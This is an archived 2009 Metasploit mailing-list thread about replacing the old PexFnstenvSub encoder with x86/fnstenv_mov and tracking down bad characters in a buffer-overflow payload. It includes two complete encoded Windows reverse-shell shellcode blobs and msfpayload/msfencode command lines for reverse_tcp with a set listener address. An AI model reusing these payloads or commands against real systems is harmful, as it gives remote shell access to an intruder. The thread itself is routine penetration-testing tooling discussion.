Metasploit mailing list archives
Re: Encoder PexFnstenvSub
From: Pedro Drimel <pedrodrimel () gmail com>
Date: Mon, 23 Nov 2009 20:03:18 -0200
I used the manual way but it's still weird, could get it working using framework-2.7 via web but not thru msfpayload/msfencode, even with current framework 3.3. Working: via msfweb - badchards: 0x00 0x0d /* win32_reverse - EXITFUNC=seh LHOST=192.168.230.130 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x06" "\xe1\x8a\x06\x83\xeb\xfc\xe2\xf4\xfa\x8b\x61\x4b\xee\x18\x75\xf9" "\xf9\x81\x01\x6a\x22\xc5\x01\x43\x3a\x6a\xf6\x03\x7e\xe0\x65\x8d" "\x49\xf9\x01\x59\x26\xe0\x61\x4f\x8d\xd5\x01\x07\xe8\xd0\x4a\x9f" "\xaa\x65\x4a\x72\x01\x20\x40\x0b\x07\x23\x61\xf2\x3d\xb5\xae\x2e" "\x73\x04\x01\x59\x22\xe0\x61\x60\x8d\xed\xc1\x8d\x59\xfd\x8b\xed" "\x05\xcd\x01\x8f\x6a\xc5\x96\x67\xc5\xd0\x51\x62\x8d\xa2\xba\x8d" "\x46\xed\x01\x76\x1a\x4c\x01\x46\x0e\xbf\xe2\x88\x48\xef\x66\x56" "\xf9\x37\xec\x55\x60\x89\xb9\x34\x6e\x96\xf9\x34\x59\xb5\x75\xd6" "\x6e\x2a\x67\xfa\x3d\xb1\x75\xd0\x59\x68\x6f\x60\x87\x0c\x82\x04" "\x53\x8b\x88\xf9\xd6\x89\x53\x0f\xf3\x4c\xdd\xf9\xd0\xb2\xd9\x55" "\x55\xa2\xd9\x45\x55\x1e\x5a\x6e\xc6\x49\x6c\x84\x60\x89\x9a\xe7" "\x60\xb2\x03\xe7\x93\x89\x66\xff\xac\x81\xdd\xf9\xd0\x8b\x9a\x57" "\x53\x1e\x5a\x60\x6c\x85\xec\x6e\x65\x8c\xe0\x56\x5f\xc8\x46\x8f" "\xe1\x8b\xce\x8f\xe4\xd0\x4a\xf5\xac\x74\x03\xfb\xf8\xa3\xa7\xf8" "\x44\xcd\x07\x7c\x3e\x4a\x21\xad\x6e\x93\x74\xb5\x10\x1e\xff\x2e" "\xf9\x37\xd1\x51\x54\xb0\xdb\x57\x6c\xe0\xdb\x57\x53\xb0\x75\xd6" "\x6e\x4c\x53\x03\xc8\xb2\x75\xd0\x6c\x1e\x75\x31\xf9\x31\xe2\xe1" "\x7f\x27\xf3\xf9\x73\xe5\x75\xd0\xf9\x96\x76\xf9\xd6\x89\x7a\x8c" "\x02\xbe\xd9\xf9\xd0\x1e\x5a\x06"; Not working: framework 3.3 root@trackback:/pentest/exploits/framework3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.230.130 LPORT=4321 EXITFUNC=seh R | ./msfencode -b '\x00\x0d' -e x86/fnstenv_mov -t c [*] x86/fnstenv_mov succeeded with size 314 (iteration=1) ... It trigger others badchars, even with EXITFUNC=thread, trying with the default options (LPORT=4444 and EXITFUNC=thread), it got other badchards (since it was working with 2.7 I gave up dealing with badchars). But, the most weird is the 2.7 command line also does not work, it goes thru some bad chards as well, I thought msfweb and msfpayload used the same code. root@trackback:~/framework-2.7# ./msfpayload win32_reverse LHOST=192.168.230.130 LPORT=4321 EXITFNUC=seh r | ./msfencode -b '\x00\x0d' -e PexFnstenvSub -t c [*] Using Msf::Encoder::PexFnstenvSub with final size of 312 bytes "\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d" "\x6b\xb3\xa1\x83\xeb\xfc\xe2\xf4\x71\x01\x58\xec\x65\x92\x4c\x5e" "\x72\x0b\x38\xcd\xa9\x4f\x38\xe4\xb1\xe0\xcf\xa4\xf5\x6a\x5c\x2a" "\xc2\x73\x38\xfe\xad\x6a\x58\xe8\x06\x5f\x38\xa0\x63\x5a\x73\x38" "\x21\xef\x73\xd5\x8a\xaa\x79\xac\x8c\xa9\x58\x55\xb6\x3f\x97\x89" "\xf8\x8e\x38\xfe\xa9\x6a\x58\xc7\x06\x67\xf8\x2a\xd2\x77\xb2\x4a" "\x8e\x47\x38\x28\xe1\x4f\xaf\xc0\x4e\x5a\x68\xc5\x06\x28\x83\x2a" "\xcd\x67\x38\xd1\x91\xc6\x38\xe1\x85\x35\xdb\x2f\xc3\x65\x5f\xf1" "\x72\xbd\xd5\xf2\xeb\x03\x80\x93\xe5\x1c\xc0\x93\xd2\x3f\x4c\x71" "\xe5\xa0\x5e\x5d\xb6\x3b\x4c\x77\xd2\xe2\x56\xc7\x0c\x86\xbb\xa3" "\xd8\x01\xb1\x5e\x5d\x03\x6a\xa8\x78\xc6\xe4\x5e\x5b\x38\xe0\xf2" "\xde\x28\xe0\xe2\xde\x94\x63\xc9\x4d\xc3\x55\x23\xeb\x03\xa3\x40" "\xeb\x38\x3a\x40\x18\x03\x5f\x58\x27\x0b\xe4\x5e\x5b\x01\xa3\xf0" "\xd8\x94\x63\xc7\xe7\x0f\xd5\xc9\xee\x06\xd9\xf1\xd4\x42\x7f\x28" "\x6a\x01\xf7\x28\x6f\x5a\x73\x52\x27\xfe\x3a\x5c\x73\x29\x9e\x5f" "\xcf\x47\x3e\xdb\xb5\xc0\x18\x0a\xe5\x19\x4d\x12\x9b\x94\xc6\x89" "\x72\xbd\xe8\xf6\xdf\x3a\xe2\xf0\xe7\x6a\xe2\xf0\xd8\x3a\x4c\x71" "\xe5\xc6\x6a\xa4\x43\x38\x4c\x77\xe7\x94\x4c\x96\x72\xbb\xdb\x46" "\xf4\xad\xca\x5e\xf8\x6f\x4c\x77\x72\x1c\x4f\x5e\x5d\x03\x43\x2b" "\x89\x34\xe0\x5e\x5b\x94\x63\xa1"; I don't mind about 2.7, would like to understand why this is not working on 3.3. Please, let me know any other test I can do in order to evaluate this. Thanks in advance. Regards, Pedro. 2009/11/23 Rob Fuller <mubix () room362 com>:
Follow the crash step by step and compare chars, see which has changed once it hits the stack and add those to your bad chars list. (that's the manual way at least, not sure if there is a more advanced way) -- Rob Fuller | Mubix Room362.com | Hak5.org | TheAcademyPro.com On Mon, Nov 23, 2009 at 11:00 AM, Pedro Drimel <pedrodrimel () gmail com> wrote:It is actually a badchars issue. I compared the output I had with the one generated with 2.7 version and it's different. Probably, in the past I had to deal with badchars but don't remember what I did. Tried to run into my buffer the following: string = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e" "\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d" "\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c" "\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b" "\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a" "\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9" "\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8" "\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7" "\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") Put a breakpoint into the memory address which performs a JMP ESP but it didn't work, if I just put some NOPs or a calc.exe it works. Thanks in advance. Regards, Pedro. 2009/11/23 HD Moore <hdm () metasploit com>:On Mon, 2009-11-23 at 12:18 -0200, Pedro Drimel wrote:Hello everyone, I used to use metasploit:55555 to generate payloads however the servers seems to be offline. I would like through command like msfpayload the same encoder as "PexFnstenvSub", I think it is x86/fnstenv_mov but didn't work as the another one. What is the encoder PexFnstenvSub?The metasploit:55555 server is just msfweb from Metasploit 2.7, you can download and run it yourself if you like, but there are really good reasons for it being offline: 1) The payloads do not work on newer versions of Windows 2) The payloads do not work with newer CPUs with NX support 3) The payloads have since been improved (reliability) and shrunk The supported way is msfpayload with msfencode, the "pexfnstenvsub" encode was not directly ported, but x86/fnstenv_mov is pretty close to it. In most cases you do not need to set the encoder, just set the bad character list in msfencode (-b '\x00'). If x86/fnstenv_mov is not working, please file a bug. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub HD Moore (Nov 23)
- Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub Rob Fuller (Nov 23)
- Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub HD Moore (Nov 23)
- Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub HD Moore (Nov 23)